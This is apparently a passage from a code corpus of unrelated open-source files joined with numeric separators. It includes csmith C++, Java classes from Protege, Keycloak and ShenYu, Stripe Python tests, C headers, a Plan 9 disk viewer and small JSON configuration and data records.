{
return (f >= 0) ? (int32_t)(f + 0.5) : (int32_t)(f - 0.5);
}
void GotBaseInit(void);
int set_bool_flag(bool *flag);
void clear_bool_flag(bool *flag);
float db_to_float(int32_t db);
uint32_t get_msb_pos(uint32_t val);
uint32_t get_lsb_pos(uint32_t val);
#endif
#ifdef __cplusplus
}
#endif
#endif
| 1,874 |
660 | // -*- mode: C++ -*-
//
// Copyright (c) 2007, 2008, 2009, 2010, 2011, 2015, 2017 The University of Utah
// All rights reserved.
//
// This file is part of `csmith', a random generator of C programs.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
#if HAVE_CONFIG_H
# include <config.h>
#endif
#ifdef WIN32
#pragma warning(disable : 4786) /* Disable annoying warning messages */
#endif
#include "StatementContinue.h"
#include <iostream>
#include <cassert>
#include "CGOptions.h"
#include "CGContext.h"
#include "Block.h"
#include "Type.h"
#include "Function.h"
#include "Expression.h"
#include "FactMgr.h"
#include "Bookkeeper.h"
#include "Error.h"
using namespace std;
///////////////////////////////////////////////////////////////////////////////
/*
*
*/
StatementContinue *
StatementContinue::make_random(CGContext &cg_context)
{
//static int g =0;
FactMgr* fm = get_fact_mgr(&cg_context);
// find the closest looping parent block: the one "continue"
// would apply to
//int h = g++;
const Block* b = cg_context.get_current_block();
const Statement* prev_stm = b->get_last_stm();
// don't generate "continue" as the first statement in a block
if (prev_stm == 0) {
return 0;
}
while (b && !b->looping) {
b = b->parent;
}
assert(b);
cg_context.get_effect_stm().clear();
Expression *expr = Expression::make_random(cg_context, get_int_type(), 0, true, true, eVariable);
ERROR_GUARD(NULL);
StatementContinue* sc = new StatementContinue(cg_context.get_current_block(), *expr, *b);
fm->create_cfg_edge(sc, b, false, true);
return sc;
}
/*
*
*/
StatementContinue::StatementContinue(Block* parent, const Expression &test, const Block &b)
: Statement(eContinue, parent),
test(test),
loop_blk(b)
{
// Nothing else to do.
}
/*
*
*/
StatementContinue::StatementContinue(const StatementContinue &sc)
: Statement(sc.get_type(), sc.parent),
test(sc.test),
loop_blk(sc.loop_blk)
{
// Nothing else to do.
}
/*
*
*/
StatementContinue::~StatementContinue(void)
{
delete &test;
}
/*
* return true if condition is always true
*/
bool
StatementContinue::must_jump(void) const
{
return test.not_equals(0);
}
/*
*
*/
void
StatementContinue::Output(std::ostream &out, FactMgr* /*fm*/, int indent) const
{
output_tab(out, indent);
out << "if (";
test.Output(out);
out << ")";
outputln(out);
output_tab(out, indent+1);
out << "continue;";
outputln(out);
}
bool
StatementContinue::visit_facts(vector<const Fact*>& inputs, CGContext& cg_context) const
{
// evaludate condition first
if (!test.visit_facts(inputs, cg_context)) {
return log_analysis_fail("StatementContinue");
}
FactMgr* fm = get_fact_mgr(&cg_context);
fm->map_stm_effect[this] = cg_context.get_effect_stm();
return true;
}
///////////////////////////////////////////////////////////////////////////////
// Local Variables:
// c-basic-offset: 4
// tab-width: 4
// End:
// End of file.
| 1,398 |
5,169 | {
"name": "KLProgressHUD",
"version": "1.0.0",
"platforms": {
"ios": "10.0"
},
"license": {
"type": "MIT",
"file": "LICENSE"
},
"summary": "swift 编写带有进度条显示的HUD。",
"homepage": "https://github.com/KYangLei/KLProgressHUD.git",
"authors": {
"KYangLei": "<EMAIL>"
},
"source": {
"git": "https://github.com/KYangLei/KLProgressHUD.git",
"tag": "1.0.0"
},
"description": "KLProgressHUD 是一个在 iOS App 上极易于使用的 HUD。主要用于显示加载、进度、情景信息、Toast。",
"source_files": "KLProgressHUD/*.swift",
"resources": "KLProgressHUD/KLProgressHUD.bundle",
"requires_arc": true,
"frameworks": [
"Foundation",
"UIKit"
],
"pod_target_xcconfig": {
"SWIFT_VERSION": "3.0"
},
"pushed_with_swift_version": "4.0"
}
| 403 |
746 | package org.protege.editor.owl.ui.action.export.inferred;
import org.protege.editor.core.ui.wizard.Wizard;
import org.protege.editor.owl.OWLEditorKit;
import org.protege.editor.owl.ui.action.OntologyFormatPage;
import org.protege.editor.owl.ui.ontology.wizard.create.OntologyIDPanel;
import org.protege.editor.owl.ui.ontology.wizard.create.PhysicalLocationPanel;
import org.semanticweb.owlapi.model.OWLAxiom;
import org.semanticweb.owlapi.model.OWLDocumentFormat;
import org.semanticweb.owlapi.model.OWLOntologyID;
import org.semanticweb.owlapi.util.InferredAxiomGenerator;
import java.net.URI;
import java.util.List;
/*
* Copyright (C) 2007, University of Manchester
*
*
*/
/**
* Author: <NAME><br>
* The University Of Manchester<br>
* Bio-Health Informatics Group<br>
* Date: 09-Aug-2007<br><br>
*/
public class ExportInferredOntologyWizard extends Wizard {
private ExportInferredOntologyWizardSelectAxiomsPanel axiomsPanel;
private ExportInferredOntologyIDPanel ontologyIRIPanel;
private PhysicalLocationPanel locationPanel;
private ExportInferredOntologyIncludeAssertedAxiomsPanel assertedAxiomsPanel;
private OntologyFormatPage ontologyFormatPanel;
public ExportInferredOntologyWizard(OWLEditorKit editorKit) {
setTitle("Export inferred axioms as ontology");
registerWizardPanel(ExportInferredOntologyWizardSelectAxiomsPanel.ID,
axiomsPanel = new ExportInferredOntologyWizardSelectAxiomsPanel(editorKit));
setCurrentPanel(ExportInferredOntologyWizardSelectAxiomsPanel.ID);
registerWizardPanel(ExportInferredOntologyIncludeAssertedAxiomsPanel.ID,
assertedAxiomsPanel = new ExportInferredOntologyIncludeAssertedAxiomsPanel(editorKit));
registerWizardPanel(OntologyIDPanel.ID, ontologyIRIPanel = new ExportInferredOntologyIDPanel(editorKit));
registerWizardPanel(PhysicalLocationPanel.ID, locationPanel = new PhysicalLocationPanel(editorKit));
registerWizardPanel(OntologyFormatPage.ID, ontologyFormatPanel = new OntologyFormatPage(editorKit));
}
public List<InferredAxiomGenerator<? extends OWLAxiom>> getInferredAxiomGenerators() {
return axiomsPanel.getInferredAxiomGenerators();
}
public OWLOntologyID getOntologyID() {
return ontologyIRIPanel.getOntologyID();
}
public URI getPhysicalURL() {
return locationPanel.getLocationURL();
}
public boolean isIncludeAnnotations() {
return assertedAxiomsPanel.isIncludeAnnotationAxioms();
}
public boolean isIncludeAssertedLogicalAxioms() {
return assertedAxiomsPanel.isIncludeAssertedLogicalAxioms();
}
public OWLDocumentFormat getFormat() {
return ontologyFormatPanel.getFormat();
}
}
| 1,003 |
534 | {
"type": "mekanism:crystallizing",
"chemicalType": "slurry",
"input": {
"amount": 200,
"slurry": "mekanism:clean_gold"
},
"output": {
"item": "mekanism:crystal_gold"
}
} | 88 |
831 | /*
* Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.tools.idea.uibuilder.api;
import com.android.tools.idea.common.model.NlComponent;
import com.android.tools.idea.uibuilder.surface.AccessoryPanel;
import org.jetbrains.annotations.NotNull;
import javax.swing.*;
import java.util.List;
import org.jetbrains.annotations.Nullable;
/**
* This is the interface to Accessory Panels they are returned by ViewGroupHandlers if they want to have a panel on the bottom of the design
* surface.
* It is used by the motionLayout handler to display the timeline.
*/
public interface AccessoryPanelInterface {
/**
* The panel to be put onto the user interface
* @return
*/
@NotNull JPanel getPanel();
@NotNull JPanel createPanel(AccessoryPanel.Type type);
/**
* Give a chance for the handler to populate the accessory panel
*
* @param type type of accessory panel
* @param selection the current selected components
*/
void updateAccessoryPanelWithSelection(@NotNull AccessoryPanel.Type type,
@NotNull List<NlComponent> selection);
/**
* Called to inform the Panel that it is no longer in use.
*/
void deactivate();
/**
* The accessory panel should send the current selection to its listeners.
*/
void requestSelection();
void updateAfterModelDerivedDataChanged();
void addListener(@NotNull AccessorySelectionListener listener);
void removeListener(@NotNull AccessorySelectionListener listener);
}
| 610 |
363 | package com.xunlei.downloadlib.parameter;
public class ServerResourceParam {
public String mCookie;
public String mRefUrl;
public int mResType;
public int mStrategy;
public String mUrl;
public ServerResourceParam(String str, String str2, String str3, int i, int i2) {
this.mUrl = str;
this.mRefUrl = str2;
this.mCookie = str3;
this.mResType = i;
this.mStrategy = i2;
}
public void setUrl(String str) {
this.mUrl = str;
}
public void setRefUrl(String str) {
this.mRefUrl = str;
}
public void setCookie(String str) {
this.mCookie = str;
}
public void setRestype(int i) {
this.mResType = i;
}
public void setStrategy(int i) {
this.mStrategy = i;
}
public boolean checkMemberVar() {
if (this.mUrl == null || this.mRefUrl == null || this.mCookie == null) {
return false;
}
return true;
}
}
| 447 |
1,178 | /*
* Definitions for talking to the CUDA. The CUDA is a microcontroller
* which controls the ADB, system power, RTC, and various other things.
*
* Copyright (C) 1996 <NAME>.
*/
#ifndef _LINUX_CUDA_H
#define _LINUX_CUDA_H
/* CUDA commands (2nd byte) */
#define CUDA_WARM_START 0
#define CUDA_AUTOPOLL 1
#define CUDA_GET_6805_ADDR 2
#define CUDA_GET_TIME 3
#define CUDA_GET_PRAM 7
#define CUDA_SET_6805_ADDR 8
#define CUDA_SET_TIME 9
#define CUDA_POWERDOWN 0xa
#define CUDA_POWERUP_TIME 0xb
#define CUDA_SET_PRAM 0xc
#define CUDA_MS_RESET 0xd
#define CUDA_SEND_DFAC 0xe
#define CUDA_RESET_SYSTEM 0x11
#define CUDA_SET_IPL 0x12
#define CUDA_SET_AUTO_RATE 0x14
#define CUDA_GET_AUTO_RATE 0x16
#define CUDA_SET_DEVICE_LIST 0x19
#define CUDA_GET_DEVICE_LIST 0x1a
#define CUDA_GET_SET_IIC 0x22
#endif /* _LINUX_CUDA_H */
| 381 |
354 | <filename>framework/delibs/destream/deInStream.h
#ifndef _DEINSTREAM_H
#define _DEINSTREAM_H
/*-------------------------------------------------------------------------
* drawElements Stream Library
* ---------------------------
*
* Copyright 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*//*!
* \file
* \brief Input stream abstraction.
*//*--------------------------------------------------------------------*/
#include "deDefs.h"
#include "deIOStream.h"
DE_BEGIN_EXTERN_C
/* Input stream struct, implemented as a wrapper to io stream */
typedef struct deInStream_s
{
deIOStream ioStream;
} deInStream;
DE_INLINE deStreamResult deInStream_read (deInStream* stream, void* buf, deInt32 bufSize, deInt32* numWritten);
DE_INLINE deStreamResult deInStream_deinit (deInStream* stream);
DE_INLINE const char* deInStream_getError (deInStream* stream);
DE_INLINE deStreamStatus deInStream_getStatus(deInStream* stream);
DE_INLINE deStreamResult deInStream_read (deInStream* stream, void* buf, deInt32 bufSize, deInt32* numWritten)
{
return deIOStream_read(&(stream->ioStream), buf, bufSize, numWritten);
}
DE_INLINE deStreamResult deInStream_deinit (deInStream* stream)
{
return deIOStream_deinit(&(stream->ioStream));
}
DE_INLINE const char* deInStream_getError (deInStream* stream)
{
return deIOStream_getError(&(stream->ioStream));
}
DE_INLINE deStreamStatus deInStream_getStatus(deInStream* stream)
{
return deIOStream_getStatus(&(stream->ioStream));
}
DE_END_EXTERN_C
#endif /* _DEINSTREAM_H */
| 631 |
1,592 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.shenyu.springboot.starter.plugin.sentinel;
import com.alibaba.csp.sentinel.adapter.spring.webflux.exception.SentinelBlockExceptionHandler;
import org.apache.shenyu.common.enums.PluginEnum;
import org.apache.shenyu.plugin.base.fallback.FallbackHandler;
import org.apache.shenyu.plugin.base.handler.PluginDataHandler;
import org.apache.shenyu.plugin.sentinel.SentinelPlugin;
import org.junit.Before;
import org.junit.Test;
import org.springframework.boot.autoconfigure.AutoConfigurations;
import org.springframework.boot.context.properties.EnableConfigurationProperties;
import org.springframework.boot.test.context.runner.ApplicationContextRunner;
import org.springframework.context.annotation.Configuration;
import org.springframework.http.codec.support.DefaultServerCodecConfigurer;
import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.Assert.assertNotNull;
/**
* Test case for {@link SentinelPluginConfiguration}.
*/
@Configuration
@EnableConfigurationProperties
public class SentinelPluginConfigurationTest {
private ApplicationContextRunner applicationContextRunner;
@Before
public void before() {
applicationContextRunner = new ApplicationContextRunner()
.withConfiguration(AutoConfigurations.of(SentinelPluginConfiguration.class))
.withBean(SentinelPluginConfigurationTest.class)
.withBean(DefaultServerCodecConfigurer.class)
.withPropertyValues("debug=true");
}
@Test
public void testSentinelPlugin() {
applicationContextRunner.run(context -> {
SentinelPlugin plugin = context.getBean("sentinelPlugin", SentinelPlugin.class);
assertNotNull(plugin);
assertThat(plugin.named()).isEqualTo(PluginEnum.SENTINEL.getName());
}
);
}
@Test
public void testSentinelFallbackHandler() {
applicationContextRunner.run(context -> {
FallbackHandler handler = context.getBean("fallbackHandler", FallbackHandler.class);
assertNotNull(handler);
}
);
}
@Test
public void testSentinelRuleHandle() {
applicationContextRunner.run(context -> {
PluginDataHandler handler = context.getBean("sentinelRuleHandle", PluginDataHandler.class);
assertNotNull(handler);
}
);
}
@Test
public void testSentinelBlockExceptionHandler() {
applicationContextRunner.run(context -> {
SentinelBlockExceptionHandler handler = context.getBean("sentinelBlockExceptionHandler", SentinelBlockExceptionHandler.class);
assertNotNull(handler);
}
);
}
}
| 1,185 |
1,374 | <gh_stars>1000+
/*
* TypeScript definitions to Java translator - http://www.jsweet.org
* Copyright (C) 2015 CINCHEO SAS <<EMAIL>>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
package org.jsweet.input.typescriptdef.visitor;
import static org.jsweet.input.typescriptdef.util.Util.getOrCreateGlobalsType;
import org.apache.commons.lang3.StringUtils;
import org.jsweet.input.typescriptdef.ast.Context;
import org.jsweet.input.typescriptdef.ast.Declaration;
import org.jsweet.input.typescriptdef.ast.DeclarationHelper;
import org.jsweet.input.typescriptdef.ast.FunctionDeclaration;
import org.jsweet.input.typescriptdef.ast.ModuleDeclaration;
import org.jsweet.input.typescriptdef.ast.Scanner;
import org.jsweet.input.typescriptdef.ast.Type;
import org.jsweet.input.typescriptdef.ast.TypeDeclaration;
import org.jsweet.input.typescriptdef.ast.VariableDeclaration;
/**
* Puts all global members in Globals types.
*
* @author <NAME>
*/
public class GlobalsCreator extends Scanner {
public GlobalsCreator(Context context) {
super(context);
}
@Override
public void visitModuleDeclaration(ModuleDeclaration moduleDeclaration) {
for (Declaration declaration : moduleDeclaration.getMembers()) {
if (declaration.isHidden()) {
continue;
}
if ((declaration instanceof VariableDeclaration) || (declaration instanceof FunctionDeclaration)) {
TypeDeclaration globalsClass = getOrCreateGlobalsType(context, moduleDeclaration,
getParent(ModuleDeclaration.class));
if (DeclarationHelper.JS_OBJECT_METHOD_NAMES.contains(declaration.getName())) {
declaration.setName(StringUtils.capitalize(declaration.getName()));
}
moduleDeclaration.removeMember(declaration);
if (declaration instanceof VariableDeclaration) {
VariableDeclaration existing = globalsClass.findVariable(declaration.getName());
if (existing != null && !existing.isHidden()) {
context.reportWarning("skip variable " + declaration + " - already exists in "
+ moduleDeclaration + " (" + existing + ")");
// variable already exists
continue;
}
}
globalsClass.addMember(declaration);
declaration.addModifier("static");
if (declaration instanceof VariableDeclaration) {
VariableDeclaration varDecl = (VariableDeclaration) declaration;
Type t = lookupType(varDecl.getType(), null);
if (t instanceof TypeDeclaration) {
final TypeDeclaration typeDeclaration = (TypeDeclaration) t;
if (!typeDeclaration.isExternal() && typeDeclaration.isStatic()) {
globalsClass.removeMember(declaration);
}
}
}
}
}
super.visitModuleDeclaration(moduleDeclaration);
}
@Override
public void visitTypeDeclaration(TypeDeclaration typeDeclaration) {
}
@Override
public void visitFunctionDeclaration(FunctionDeclaration functionDeclaration) {
}
@Override
public void visitVariableDeclaration(VariableDeclaration variableDeclaration) {
}
}
| 1,158 |
2,151 | // Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_SERVICES_FILE_UTIL_ZIP_FILE_CREATOR_H_
#define CHROME_SERVICES_FILE_UTIL_ZIP_FILE_CREATOR_H_
#include <vector>
#include "chrome/services/file_util/public/mojom/zip_file_creator.mojom.h"
#include "components/services/filesystem/public/interfaces/directory.mojom.h"
#include "services/service_manager/public/cpp/service_context_ref.h"
namespace base {
class FilePath;
}
namespace chrome {
class ZipFileCreator : public chrome::mojom::ZipFileCreator {
public:
explicit ZipFileCreator(
std::unique_ptr<service_manager::ServiceContextRef> service_ref);
~ZipFileCreator() override;
private:
// chrome::mojom::ZipFileCreator:
void CreateZipFile(filesystem::mojom::DirectoryPtr source_dir_mojo,
const base::FilePath& source_dir,
const std::vector<base::FilePath>& source_relative_paths,
base::File zip_file,
CreateZipFileCallback callback) override;
const std::unique_ptr<service_manager::ServiceContextRef> service_ref_;
DISALLOW_COPY_AND_ASSIGN(ZipFileCreator);
};
} // namespace chrome
#endif // CHROME_SERVICES_FILE_UTIL_ZIP_FILE_CREATOR_H_
| 509 |
348 | {"nom":"Escalles","circ":"7ème circonscription","dpt":"Pas-de-Calais","inscrits":198,"abs":86,"votants":112,"blancs":1,"nuls":5,"exp":106,"res":[{"nuance":"LR","nom":"<NAME>","voix":85},{"nuance":"FN","nom":"<NAME>","voix":21}]} | 94 |
1,078 | from __future__ import absolute_import, division, print_function
import stripe
TEST_RESOURCE_ID = "si_123"
class TestSubscriptionItem(object):
def test_is_listable(self, request_mock):
resources = stripe.SubscriptionItem.list(subscription="sub_123")
request_mock.assert_requested(
"get", "/v1/subscription_items", {"subscription": "sub_123"}
)
assert isinstance(resources.data, list)
assert isinstance(resources.data[0], stripe.SubscriptionItem)
def test_is_retrievable(self, request_mock):
resource = stripe.SubscriptionItem.retrieve(TEST_RESOURCE_ID)
request_mock.assert_requested(
"get", "/v1/subscription_items/%s" % TEST_RESOURCE_ID
)
assert isinstance(resource, stripe.SubscriptionItem)
def test_is_creatable(self, request_mock):
resource = stripe.SubscriptionItem.create(
price="price_123", subscription="sub_123"
)
request_mock.assert_requested("post", "/v1/subscription_items")
assert isinstance(resource, stripe.SubscriptionItem)
def test_is_saveable(self, request_mock):
resource = stripe.SubscriptionItem.retrieve(TEST_RESOURCE_ID)
resource.price = "price_123"
resource.save()
request_mock.assert_requested(
"post",
"/v1/subscription_items/%s" % TEST_RESOURCE_ID,
{"price": "price_123"},
)
def test_is_modifiable(self, request_mock):
resource = stripe.SubscriptionItem.modify(
TEST_RESOURCE_ID, price="price_123"
)
request_mock.assert_requested(
"post",
"/v1/subscription_items/%s" % TEST_RESOURCE_ID,
{"price": "price_123"},
)
assert isinstance(resource, stripe.SubscriptionItem)
def test_is_deletable(self, request_mock):
resource = stripe.SubscriptionItem.retrieve(TEST_RESOURCE_ID)
resource.delete()
request_mock.assert_requested(
"delete", "/v1/subscription_items/%s" % TEST_RESOURCE_ID
)
assert resource.deleted is True
def test_can_delete(self, request_mock):
resource = stripe.SubscriptionItem.delete(TEST_RESOURCE_ID)
request_mock.assert_requested(
"delete", "/v1/subscription_items/%s" % TEST_RESOURCE_ID
)
assert resource.deleted is True
class TestUsageRecords(object):
def test_is_creatable(self, request_mock):
resource = stripe.SubscriptionItem.create_usage_record(
TEST_RESOURCE_ID,
quantity=5000,
timestamp=1524182400,
action="increment",
)
request_mock.assert_requested(
"post",
"/v1/subscription_items/%s/usage_records" % TEST_RESOURCE_ID,
)
assert isinstance(resource, stripe.UsageRecord)
class TestUsageRecordSummaries(object):
def test_is_listable(self, request_mock):
resource = stripe.SubscriptionItem.list_usage_record_summaries(
TEST_RESOURCE_ID
)
request_mock.assert_requested(
"get",
"/v1/subscription_items/%s/usage_record_summaries"
% TEST_RESOURCE_ID,
)
assert isinstance(resource.data, list)
assert isinstance(resource.data[0], stripe.UsageRecordSummary)
| 1,498 |
1,391 | <reponame>newluhux/plan9port<filename>src/cmd/vbackup/diskftp.c<gh_stars>1000+
#include <u.h>
#include <libc.h>
#include <thread.h>
#include <sunrpc.h>
#include <nfs3.h>
#include <diskfs.h>
int debug;
void
usage(void)
{
fprint(2, "usage: fsview fspartition cmd\n");
fprint(2, "cmd is:\n");
fprint(2, "\tcat file\n");
fprint(2, "\tls dir\n");
fprint(2, "\tstat file\n");
threadexitsall("usage");
}
void
printattr(Nfs3Attr *attr)
{
Fmt fmt;
char buf[256];
fmtfdinit(&fmt, 2, buf, sizeof buf);
nfs3attrprint(&fmt, attr);
fmtfdflush(&fmt);
fprint(2, "\n");
}
char buf[8192];
void
x(int ok)
{
if(ok != Nfs3Ok){
nfs3errstr(ok);
sysfatal("%r");
}
}
void
threadmain(int argc, char **argv)
{
char *p, *q;
u32int n;
Disk *disk;
Fsys *fsys;
Nfs3Handle h;
SunAuthUnix au;
Nfs3Attr attr;
u64int offset;
u1int eof;
uchar *data;
char *link;
ARGBEGIN{
case 'd':
debug = 1;
break;
default:
usage();
}ARGEND
if(argc != 3)
usage();
if((disk = diskopenfile(argv[0])) == nil)
sysfatal("diskopen: %r");
if((disk = diskcache(disk, 16384, 16)) == nil)
sysfatal("diskcache: %r");
if((fsys = fsysopen(disk)) == nil)
sysfatal("fsysopen: %r");
allowall = 1;
memset(&au, 0, sizeof au);
/* walk */
if(debug) fprint(2, "get root...");
x(fsysroot(fsys, &h));
p = argv[2];
while(*p){
while(*p == '/')
p++;
if(*p == 0)
break;
q = strchr(p, '/');
if(q){
*q = 0;
q++;
}else
q = "";
if(debug) fprint(2, "walk %s...", p);
x(fsyslookup(fsys, &au, &h, p, &h));
p = q;
}
if(debug) fprint(2, "getattr...");
x(fsysgetattr(fsys, &au, &h, &attr));
printattr(&attr);
/* do the op */
if(strcmp(argv[1], "cat") == 0){
switch(attr.type){
case Nfs3FileReg:
case Nfs3FileDir:
offset = 0;
for(;;){
x(fsysreadfile(fsys, &au, &h, sizeof buf, offset, &data, &n, &eof));
if(n){
write(1, data, n);
free(data);
offset += n;
}
if(eof)
break;
}
break;
case Nfs3FileSymlink:
x(fsysreadlink(fsys, &au, &h, &link));
print("%s\n", link);
break;
default:
print("cannot cat: not file, not link\n");
break;
}
}else if(strcmp(argv[1], "ls") == 0){
/* not implemented */
}else if(strcmp(argv[1], "stat") == 0){
/* already done */
}
threadexitsall(nil);
}
| 1,167 |
9,472 | <gh_stars>1000+
#pragma once
#include <stdbool.h>
#include <Python.h>
#ifdef PIPELINE_PAIR
typedef struct {
bool is_task;
PyObject* request;
PyObject* task;
} PipelineEntry;
static inline bool
PipelineEntry_is_task(PipelineEntry entry)
{
return entry.is_task;
}
static inline void
PipelineEntry_DECREF(PipelineEntry entry)
{
Py_DECREF(entry.request);
// if not real task this was response,
// that was inside request that was already freed above
if(entry.is_task)
Py_XDECREF(entry.task);
}
static inline void
PipelineEntry_INCREF(PipelineEntry entry)
{
Py_INCREF(entry.request);
Py_XINCREF(entry.task);
}
static inline PyObject*
PipelineEntry_get_task(PipelineEntry entry)
{
return entry.task;
}
#else
typedef PyObject* PipelineEntry;
static inline bool
PipelineEntry_is_task(PipelineEntry entry)
{
return true;
}
static inline void
PipelineEntry_DECREF(PipelineEntry entry)
{
Py_DECREF(entry);
}
static inline void
PipelineEntry_INCREF(PipelineEntry entry)
{
Py_INCREF(entry);
}
static inline PyObject*
PipelineEntry_get_task(PipelineEntry entry)
{
return entry;
}
#endif
typedef struct {
PyObject_HEAD
#ifdef PIPELINE_OPAQUE
PyObject* ready;
#else
void* (*ready)(PipelineEntry, PyObject*);
PyObject* protocol;
#endif
PyObject* task_done;
PipelineEntry queue[10];
size_t queue_start;
size_t queue_end;
} Pipeline;
#define PIPELINE_EMPTY(p) ((p)->queue_start == (p)->queue_end)
#ifndef PIPELINE_OPAQUE
PyObject*
Pipeline_new(Pipeline* self);
void
Pipeline_dealloc(Pipeline* self);
int
Pipeline_init(Pipeline* self, void* (*ready)(PipelineEntry, PyObject*), PyObject* protocol);
PyObject*
Pipeline_queue(Pipeline* self, PipelineEntry entry);
void*
Pipeline_cancel(Pipeline* self);
void*
cpipeline_init(void);
#endif
| 707 |
728 | package org.sirix.node.interfaces.immutable;
/**
* Immutable value node (for instance text-, attribute-node...).
*
* @author <NAME>
*
*/
public interface ImmutableValueNode {
/**
* Return a byte array representation of the node value.
*
* @return the value of the node
*/
byte[] getRawValue();
/**
* Return the string value of the node.
*
* @return the string value of the node
*/
String getValue();
}
| 146 |
12,252 | /*
* Copyright 2016 Red Hat, Inc. and/or its affiliates
* and other contributors as indicated by the @author tags.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.keycloak.models.jpa.entities;
import org.hibernate.annotations.Nationalized;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.FetchType;
import javax.persistence.Id;
import javax.persistence.IdClass;
import javax.persistence.JoinColumn;
import javax.persistence.ManyToOne;
import javax.persistence.NamedQueries;
import javax.persistence.NamedQuery;
import javax.persistence.Table;
import java.io.Serializable;
/**
* @author <a href="mailto:<EMAIL>"><NAME></a>
* @version $Revision: 1 $
*/
@NamedQueries({
@NamedQuery(name="deleteRealmAttributesByRealm", query="delete from RealmAttributeEntity attr where attr.realm = :realm")
})
@Table(name="REALM_ATTRIBUTE")
@Entity
@IdClass(RealmAttributeEntity.Key.class)
public class RealmAttributeEntity {
@Id
@ManyToOne(fetch= FetchType.LAZY)
@JoinColumn(name = "REALM_ID")
protected RealmEntity realm;
@Id
@Column(name = "NAME")
protected String name;
@Nationalized
@Column(name = "VALUE")
protected String value;
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getValue() {
return value;
}
public void setValue(String value) {
this.value = value;
}
public RealmEntity getRealm() {
return realm;
}
public void setRealm(RealmEntity realm) {
this.realm = realm;
}
public static class Key implements Serializable {
protected RealmEntity realm;
protected String name;
public Key() {
}
public Key(RealmEntity user, String name) {
this.realm = user;
this.name = name;
}
public RealmEntity getRealm() {
return realm;
}
public String getName() {
return name;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
Key key = (Key) o;
if (name != null ? !name.equals(key.name) : key.name != null) return false;
if (realm != null ? !realm.getId().equals(key.realm != null ? key.realm.getId() : null) : key.realm != null) return false;
return true;
}
@Override
public int hashCode() {
int result = realm != null ? realm.getId().hashCode() : 0;
result = 31 * result + (name != null ? name.hashCode() : 0);
return result;
}
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null) return false;
if (!(o instanceof RealmAttributeEntity)) return false;
RealmAttributeEntity key = (RealmAttributeEntity) o;
if (name != null ? !name.equals(key.name) : key.name != null) return false;
if (realm != null ? !realm.getId().equals(key.realm != null ? key.realm.getId() : null) : key.realm != null) return false;
return true;
}
@Override
public int hashCode() {
int result = realm != null ? realm.getId().hashCode() : 0;
result = 31 * result + (name != null ? name.hashCode() : 0);
return result;
}
}
| 1,563 |
504 | <reponame>smmccabe/dsl
package com.structurizr.dsl;
